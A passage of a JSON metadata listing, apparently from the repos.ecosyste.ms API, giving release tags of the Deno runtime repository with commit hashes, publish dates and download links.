ps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitH